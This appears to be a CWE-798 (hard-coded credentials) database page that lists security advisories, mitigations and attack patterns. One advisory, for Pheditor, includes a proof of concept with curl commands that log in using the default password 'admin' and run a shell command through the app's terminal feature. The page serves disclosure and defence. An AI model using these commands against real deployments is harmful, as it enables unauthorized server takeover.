Common Weakness Enumeration

CWE-798

Allowed-with-Review

Use of Hard-coded Credentials

Abstraction: Base · Status: Draft

The product contains hard-coded credentials, such as a password or cryptographic key.

2176 vulnerabilities reference this CWE, most recent first.

GHSA-P4H7-P9RJ-2PQ2

Vulnerability from github – Published: 2026-07-16 20:11 – Updated: 2026-07-16 20:11
VLAI
Summary
Pheditor: Hardcoded default password 'admin' with no forced change enables full application compromise
Details

Summary

Pheditor ships with a hardcoded default password admin (SHA-512 hash stored at pheditor.php:11). There is no mechanism to force a password change on first login. Any deployment using the default credentials grants an attacker full access to the file editor, file upload, and terminal features, enabling arbitrary file read/write and remote code execution.

Details

Tested repository: https://github.com/pheditor/pheditor

Tested commit: e538f05b6faec99e5b23726bc9c17d6b57774297 (current HEAD on main)

Affected version: All versions of Pheditor

The password is hardcoded at pheditor.php:11:

define('PASSWORD', 'c7ad44cbad762a5da0a452f9e854fdc1e0e7a52a38015f23f3eab1d80b931dd472634dfac71cd34ebc35d16ab7fb8a90c81f975113d6c7538dc69dd8de9077ec');

This is the SHA-512 hash of the string admin:

echo -n 'admin' | sha512sum
c7ad44cbad762a5da0a452f9e854fdc1e0e7a52a38015f23f3eab1d80b931dd472634dfac71cd34ebc35d16ab7fb8a90c81f975113d6c7538dc69dd8de9077ec

The application displays a warning banner at pheditor.php:1956-1958 when the default password is in use, but this is only visual — there is no forced password change, no expiry, no lockout, and no setup wizard. Many deployments run with the default indefinitely.

The password hash is stored as unsalted SHA-512 in the source code. The password change feature (lines 363-391) writes the new hash directly into the PHP source file, meaning anyone with read access to the source can extract it.

Combined impact: With the default password, an unauthenticated attacker can authenticate and exploit the terminal RCE and file upload vulnerabilities for immediate server compromise.

PoC

Environment: Any system running Pheditor with default configuration.

Setup:

git clone https://github.com/pheditor/pheditor /tmp/pheditor-test
cd /tmp/pheditor-test
php -S localhost:8080 pheditor.php &

Positive trigger — authenticate with default password:

curl -s -c /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \
  -d "pheditor_password=admin" -L -o /dev/null -w "%{http_code}"

Expected: 200 — successful authentication with the default password admin.

Verify full access:

TOKEN=$(curl -s -b /tmp/cookies.txt http://localhost:8080/pheditor.php | \
  grep -o 'token = "[a-f0-9]*"' | grep -o '"[a-f0-9]*"' | tr -d '"')
curl -s -b /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \
  --data-urlencode "action=terminal" \
  --data-urlencode "token=$TOKEN" \
  --data-urlencode 'command=echo `id`' \
  --data-urlencode "dir="

Expected: id output showing web server user — proves full system access through default credentials combined with terminal RCE.

Control (wrong password):

curl -s -X POST http://localhost:8080/pheditor.php \
  -d "pheditor_password=wrongpassword" | grep -o 'not correct'

Expected: not correct — authentication logic works but default password is trivially guessable.

Cleanup:

kill %1; rm -rf /tmp/pheditor-test /tmp/cookies.txt

Impact

Use of Hard-coded Credentials (CWE-798). The default password admin is publicly documented in the source code, trivially guessable, and there is no mechanism to force a password change on first login. This effectively grants unauthenticated remote attackers full administrator access to the application.

Attacker privileges: Unauthenticated remote attacker (PR:N).

Security boundary crossed: Unauthenticated → fully authenticated administrator.

Confidentiality impact: High — read all files within MAIN_DIR and beyond (via terminal).

Integrity impact: High — write/delete files, upload webshells, modify application code, execute arbitrary commands.

Availability impact: High — delete files and directories, disrupt services.

Suggested remediation: 1. Remove the default password — require user to set a password during installation. 2. Add a setup wizard that forces password creation on first access. 3. Add a forced password change on first login with default credentials. 4. Use password_hash() / password_verify() with PASSWORD_BCRYPT instead of raw SHA-512.

Credits

  • Thai Son Dinh from VinSOC Labs (R&D)
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "pheditor/pheditor"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.1"
            },
            {
              "fixed": "2.0.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-55579"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-798"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-07-16T20:11:23Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "### Summary\n\nPheditor ships with a hardcoded default password `admin` (SHA-512 hash stored at `pheditor.php:11`). There is no mechanism to force a password change on first login. Any deployment using the default credentials grants an attacker full access to the file editor, file upload, and terminal features, enabling arbitrary file read/write and remote code execution.\n\n### Details\n\nTested repository: https://github.com/pheditor/pheditor\n\nTested commit: `e538f05b6faec99e5b23726bc9c17d6b57774297` (current HEAD on `main`)\n\nAffected version: All versions of Pheditor\n\nThe password is hardcoded at `pheditor.php:11`:\n\n```php\ndefine(\u0027PASSWORD\u0027, \u0027c7ad44cbad762a5da0a452f9e854fdc1e0e7a52a38015f23f3eab1d80b931dd472634dfac71cd34ebc35d16ab7fb8a90c81f975113d6c7538dc69dd8de9077ec\u0027);\n```\n\nThis is the SHA-512 hash of the string `admin`:\n```bash\necho -n \u0027admin\u0027 | sha512sum\nc7ad44cbad762a5da0a452f9e854fdc1e0e7a52a38015f23f3eab1d80b931dd472634dfac71cd34ebc35d16ab7fb8a90c81f975113d6c7538dc69dd8de9077ec\n```\n\nThe application displays a warning banner at `pheditor.php:1956-1958` when the default password is in use, but this is only visual \u2014 there is no forced password change, no expiry, no lockout, and no setup wizard. Many deployments run with the default indefinitely.\n\nThe password hash is stored as unsalted SHA-512 in the source code. The password change feature (lines 363-391) writes the new hash directly into the PHP source file, meaning anyone with read access to the source can extract it.\n\n**Combined impact:** With the default password, an unauthenticated attacker can authenticate and exploit the terminal RCE and file upload vulnerabilities for immediate server compromise.\n\n### PoC\n\n**Environment:** Any system running Pheditor with default configuration.\n\n**Setup:**\n```bash\ngit clone https://github.com/pheditor/pheditor /tmp/pheditor-test\ncd /tmp/pheditor-test\nphp -S localhost:8080 pheditor.php \u0026\n```\n\n**Positive trigger \u2014 authenticate with default password:**\n```bash\ncurl -s -c /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \\\n  -d \"pheditor_password=admin\" -L -o /dev/null -w \"%{http_code}\"\n```\nExpected: `200` \u2014 successful authentication with the default password `admin`.\n\n**Verify full access:**\n```bash\nTOKEN=$(curl -s -b /tmp/cookies.txt http://localhost:8080/pheditor.php | \\\n  grep -o \u0027token = \"[a-f0-9]*\"\u0027 | grep -o \u0027\"[a-f0-9]*\"\u0027 | tr -d \u0027\"\u0027)\ncurl -s -b /tmp/cookies.txt -X POST http://localhost:8080/pheditor.php \\\n  --data-urlencode \"action=terminal\" \\\n  --data-urlencode \"token=$TOKEN\" \\\n  --data-urlencode \u0027command=echo `id`\u0027 \\\n  --data-urlencode \"dir=\"\n```\nExpected: `id` output showing web server user \u2014 proves full system access through default credentials combined with terminal RCE.\n\n**Control (wrong password):**\n```bash\ncurl -s -X POST http://localhost:8080/pheditor.php \\\n  -d \"pheditor_password=wrongpassword\" | grep -o \u0027not correct\u0027\n```\nExpected: `not correct` \u2014 authentication logic works but default password is trivially guessable.\n\n**Cleanup:**\n```bash\nkill %1; rm -rf /tmp/pheditor-test /tmp/cookies.txt\n```\n\n### Impact\n\nUse of Hard-coded Credentials (CWE-798). The default password `admin` is publicly documented in the source code, trivially guessable, and there is no mechanism to force a password change on first login. This effectively grants unauthenticated remote attackers full administrator access to the application.\n\n**Attacker privileges:** Unauthenticated remote attacker (PR:N).\n\n**Security boundary crossed:** Unauthenticated \u2192 fully authenticated administrator.\n\n**Confidentiality impact:** High \u2014 read all files within MAIN_DIR and beyond (via terminal).\n\n**Integrity impact:** High \u2014 write/delete files, upload webshells, modify application code, execute arbitrary commands.\n\n**Availability impact:** High \u2014 delete files and directories, disrupt services.\n\n**Suggested remediation:**\n1. Remove the default password \u2014 require user to set a password during installation.\n2. Add a setup wizard that forces password creation on first access.\n3. Add a forced password change on first login with default credentials.\n4. Use `password_hash()` / `password_verify()` with `PASSWORD_BCRYPT` instead of raw SHA-512.\n\n### Credits\n- Thai Son Dinh from VinSOC Labs (R\u0026D)",
  "id": "GHSA-p4h7-p9rj-2pq2",
  "modified": "2026-07-16T20:11:23Z",
  "published": "2026-07-16T20:11:23Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/pheditor/pheditor/security/advisories/GHSA-p4h7-p9rj-2pq2"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/pheditor/pheditor"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pheditor/pheditor/releases/tag/2.0.6"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Pheditor: Hardcoded default password \u0027admin\u0027 with no forced change enables full application compromise"
}

GHSA-P4RR-QWVG-X2JF

Vulnerability from github – Published: 2022-06-14 00:00 – Updated: 2022-06-23 00:00
VLAI
Details

Rakuten Casa version AP_F_V1_4_1 or AP_F_V2_0_0 uses a hard-coded credential which may allow a remote unauthenticated attacker to log in with the root privilege and perform an arbitrary operation.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-29525"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-798"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-06-13T05:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "Rakuten Casa version AP_F_V1_4_1 or AP_F_V2_0_0 uses a hard-coded credential which may allow a remote unauthenticated attacker to log in with the root privilege and perform an arbitrary operation.",
  "id": "GHSA-p4rr-qwvg-x2jf",
  "modified": "2022-06-23T00:00:34Z",
  "published": "2022-06-14T00:00:37Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-29525"
    },
    {
      "type": "WEB",
      "url": "https://jvn.jp/en/jp/JVN46892984/index.html"
    },
    {
      "type": "WEB",
      "url": "https://network.mobile.rakuten.co.jp/information/news/product/1033"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-P4XG-8HF3-JQXQ

Vulnerability from github – Published: 2023-11-06 21:31 – Updated: 2023-11-06 21:31
VLAI
Details

Weintek EasyBuilder Pro contains a vulnerability that, even when the private key is immediately deleted after the crash report transmission is finished, the private key is exposed to the public, which could result in obtaining remote control of the crash report server.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-5777"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-798"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-11-06T20:15:08Z",
    "severity": "CRITICAL"
  },
  "details": "\n\n\nWeintek EasyBuilder Pro contains a vulnerability that, even when the private key is immediately deleted after the crash report transmission is finished, the private key is exposed to the public, which could result in obtaining remote control of the crash report server.\n\n\n\n",
  "id": "GHSA-p4xg-8hf3-jqxq",
  "modified": "2023-11-06T21:31:08Z",
  "published": "2023-11-06T21:31:08Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5777"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-23-306-05"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-P4XH-4869-8VRG

Vulnerability from github – Published: 2022-05-24 19:13 – Updated: 2024-09-30 20:18
VLAI
Summary
AdaptiveScale LXDUI Hardcoded JWT Secret Key
Details

A Hardcoded JWT Secret Key in __metadata__.py metadata.py in AdaptiveScale LXDUI through 2.1.3 allows attackers to gain admin access to the host system.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "lxdui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "2.1.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-40494"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-798"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-04-22T22:34:01Z",
    "nvd_published_at": "2021-09-03T02:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "A Hardcoded JWT Secret Key in `__metadata__.py` metadata.py in AdaptiveScale LXDUI through 2.1.3 allows attackers to gain admin access to the host system.",
  "id": "GHSA-p4xh-4869-8vrg",
  "modified": "2024-09-30T20:18:44Z",
  "published": "2022-05-24T19:13:00Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-40494"
    },
    {
      "type": "WEB",
      "url": "https://github.com/AdaptiveScale/lxdui/pull/353"
    },
    {
      "type": "WEB",
      "url": "https://github.com/AdaptiveScale/lxdui/commit/e4bffeb9d69a5700a642cb6424453d1894e50d84"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/AdaptiveScale/lxdui"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/lxdui/PYSEC-2021-342.yaml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "AdaptiveScale LXDUI Hardcoded JWT Secret Key"
}

GHSA-P5C4-4HC3-4FP5

Vulnerability from github – Published: 2025-10-22 09:30 – Updated: 2025-10-22 09:30
VLAI
Details

The wsc server uses a hard-coded certificate to check the authenticity of SOAP messages. An unauthenticated remote attacker can extract private keys from the Software of the affected devices.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-41722"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-798"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-10-22T07:15:33Z",
    "severity": "HIGH"
  },
  "details": "The wsc server uses a hard-coded certificate to check the authenticity of SOAP messages. An unauthenticated remote attacker can extract private keys from the Software of the affected devices.",
  "id": "GHSA-p5c4-4hc3-4fp5",
  "modified": "2025-10-22T09:30:18Z",
  "published": "2025-10-22T09:30:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41722"
    },
    {
      "type": "WEB",
      "url": "https://sauter.csaf-tp.certvde.com/.well-known/csaf/white/2025/vde-2025-060.json"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-P6JX-JGRW-XRP7

Vulnerability from github – Published: 2022-05-13 01:10 – Updated: 2022-05-13 01:10
VLAI
Details

Trango Apex <= 2.1.1, ApexLynx < 2.0, ApexOrion < 2.0, ApexPlus <= 3.2.0, Giga <= 2.6.1, GigaLynx < 2.0, GigaOrion < 2.0, GigaPlus <= 3.2.3, GigaPro <= 1.4.1, StrataLink < 3.0, and StrataPro devices have a built-in, hidden root account, with a default password that was once stored in cleartext within a software update package on a Trango FTP server. This account is accessible via SSH and/or TELNET, and grants access to the underlying embedded UNIX OS on the device, allowing full control over it.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2016-10305"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-798"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-03-30T07:59:00Z",
    "severity": "CRITICAL"
  },
  "details": "Trango Apex \u003c= 2.1.1, ApexLynx \u003c 2.0, ApexOrion \u003c 2.0, ApexPlus \u003c= 3.2.0, Giga \u003c= 2.6.1, GigaLynx \u003c 2.0, GigaOrion \u003c 2.0, GigaPlus \u003c= 3.2.3, GigaPro \u003c= 1.4.1, StrataLink \u003c 3.0, and StrataPro devices have a built-in, hidden root account, with a default password that was once stored in cleartext within a software update package on a Trango FTP server. This account is accessible via SSH and/or TELNET, and grants access to the underlying embedded UNIX OS on the device, allowing full control over it.",
  "id": "GHSA-p6jx-jgrw-xrp7",
  "modified": "2022-05-13T01:10:22Z",
  "published": "2022-05-13T01:10:22Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-10305"
    },
    {
      "type": "WEB",
      "url": "http://blog.iancaling.com/post/153011925478"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-P6XG-79J4-4PV6

Vulnerability from github – Published: 2022-06-10 00:00 – Updated: 2022-06-18 00:00
VLAI
Details

An issue was discovered in the IGEL Universal Management Suite (UMS) 6.07.100. A hardcoded DES key in the LDAPDesPWEncrypter class allows an attacker, who has discovered encrypted LDAP bind credentials, to decrypt those credentials using a static 8-byte DES key.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-25807"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-798"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-06-09T04:15:00Z",
    "severity": "MODERATE"
  },
  "details": "An issue was discovered in the IGEL Universal Management Suite (UMS) 6.07.100. A hardcoded DES key in the LDAPDesPWEncrypter class allows an attacker, who has discovered encrypted LDAP bind credentials, to decrypt those credentials using a static 8-byte DES key.",
  "id": "GHSA-p6xg-79j4-4pv6",
  "modified": "2022-06-18T00:00:23Z",
  "published": "2022-06-10T00:00:58Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-25807"
    },
    {
      "type": "WEB",
      "url": "https://github.com/atredispartners/advisories/blob/master/ATREDIS-2022-0002.md"
    },
    {
      "type": "WEB",
      "url": "https://www.igel.com/igel-solution-family/universal-management-suite"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-P729-59M3-2M8R

Vulnerability from github – Published: 2022-05-24 19:12 – Updated: 2022-05-24 19:12
VLAI
Details

Use of a hard-coded cryptographic key in MIK.starlight 7.9.5.24363 allows local users to decrypt credentials via unspecified vectors.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-36234"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-798"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-08-31T18:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Use of a hard-coded cryptographic key in MIK.starlight 7.9.5.24363 allows local users to decrypt credentials via unspecified vectors.",
  "id": "GHSA-p729-59m3-2m8r",
  "modified": "2022-05-24T19:12:33Z",
  "published": "2022-05-24T19:12:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-36234"
    },
    {
      "type": "WEB",
      "url": "https://www.syss.de"
    },
    {
      "type": "WEB",
      "url": "https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-039.txt"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-P74R-MVHV-7JX7

Vulnerability from github – Published: 2024-02-15 09:30 – Updated: 2024-02-15 09:30
VLAI
Details

Use of a hard-coded password for a special database account created during Comarch ERP XL installation allows an attacker to retrieve embedded sensitive data stored in the database. The password is same among all Comarch ERP XL installations.

This issue affects ERP XL: from 2020.2.2 through 2023.2.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-4539"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-798"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-02-15T09:15:33Z",
    "severity": "HIGH"
  },
  "details": "Use of a hard-coded password for a special database account created during Comarch ERP XL installation allows an attacker to retrieve embedded sensitive data stored in the database. The password is same among all Comarch ERP XL installations. \n\nThis issue affects ERP XL: from 2020.2.2 through 2023.2.",
  "id": "GHSA-p74r-mvhv-7jx7",
  "modified": "2024-02-15T09:30:36Z",
  "published": "2024-02-15T09:30:36Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4539"
    },
    {
      "type": "WEB",
      "url": "https://cert.pl/en/posts/2024/02/CVE-2023-4537"
    },
    {
      "type": "WEB",
      "url": "https://cert.pl/posts/2024/02/CVE-2023-4537"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-P7F3-V9J2-H27R

Vulnerability from github – Published: 2024-08-16 18:30 – Updated: 2024-08-17 00:31
VLAI
Details

H3C R3010 v100R002L02 was discovered to contain a hardcoded password vulnerability in /etc/shadow, which allows attackers to log in as root.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-42637"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-798"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-08-16T18:15:09Z",
    "severity": "CRITICAL"
  },
  "details": "H3C R3010 v100R002L02 was discovered to contain a hardcoded password vulnerability in /etc/shadow, which allows attackers to log in as root.",
  "id": "GHSA-p7f3-v9j2-h27r",
  "modified": "2024-08-17T00:31:03Z",
  "published": "2024-08-16T18:30:57Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-42637"
    },
    {
      "type": "WEB",
      "url": "https://palm-vertebra-fe9.notion.site/H3C-R3010V100R002L02-was-discovered-to-contain-a-hardcoded-d3212602f84443d4b17e3247b3e6b129"
    },
    {
      "type": "WEB",
      "url": "https://www.h3c.com/cn/d_202308/1907175_30005_0.htm"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design
  • For outbound authentication: store passwords, keys, and other credentials outside of the code in a strongly-protected, encrypted configuration file or database that is protected from access by all outsiders, including other local users on the same system. Properly protect the key (CWE-320). If you cannot use encryption to protect the file, then make sure that the permissions are as restrictive as possible [REF-7].
  • In Windows environments, the Encrypted File System (EFS) may provide some protection.
Mitigation
Architecture and Design

For inbound authentication: Rather than hard-code a default username and password, key, or other authentication credentials for first time logins, utilize a "first login" mode that requires the user to enter a unique strong password or key.

Mitigation
Architecture and Design

If the product must contain hard-coded credentials or they cannot be removed, perform access control checks and limit which entities can access the feature that requires the hard-coded credentials. For example, a feature might only be enabled through the system console instead of through a network connection.

Mitigation
Architecture and Design
  • For inbound authentication using passwords: apply strong one-way hashes to passwords and store those hashes in a configuration file or database with appropriate access control. That way, theft of the file/database still requires the attacker to try to crack the password. When handling an incoming password during authentication, take the hash of the password and compare it to the saved hash.
  • Use randomly assigned salts for each separate hash that is generated. This increases the amount of computation that an attacker needs to conduct a brute-force attack, possibly limiting the effectiveness of the rainbow table method.
Mitigation
Architecture and Design
  • For front-end to back-end connections: Three solutions are possible, although none are complete.
  • The first suggestion involves the use of generated passwords or keys that are changed automatically and must be entered at given time intervals by a system administrator. These passwords will be held in memory and only be valid for the time intervals.
  • Next, the passwords or keys should be limited at the back end to only performing actions valid for the front end, as opposed to having full access.
  • Finally, the messages sent should be tagged and checksummed with time sensitive values so as to prevent replay-style attacks.
CAPEC-191: Read Sensitive Constants Within an Executable

An adversary engages in activities to discover any sensitive constants present within the compiled code of an executable. These constants may include literal ASCII strings within the file itself, or possibly strings hard-coded into particular routines that can be revealed by code refactoring methods including static and dynamic analysis.

CAPEC-70: Try Common or Default Usernames and Passwords

An adversary may try certain common or default usernames and passwords to gain access into the system and perform unauthorized actions. An adversary may try an intelligent brute force using empty passwords, known vendor default credentials, as well as a dictionary of common usernames and passwords. Many vendor products come preconfigured with default (and thus well-known) usernames and passwords that should be deleted prior to usage in a production environment. It is a common mistake to forget to remove these default login credentials. Another problem is that users would pick very simple (common) passwords (e.g. "secret" or "password") that make it easier for the attacker to gain access to the system compared to using a brute force attack or even a dictionary attack using a full dictionary.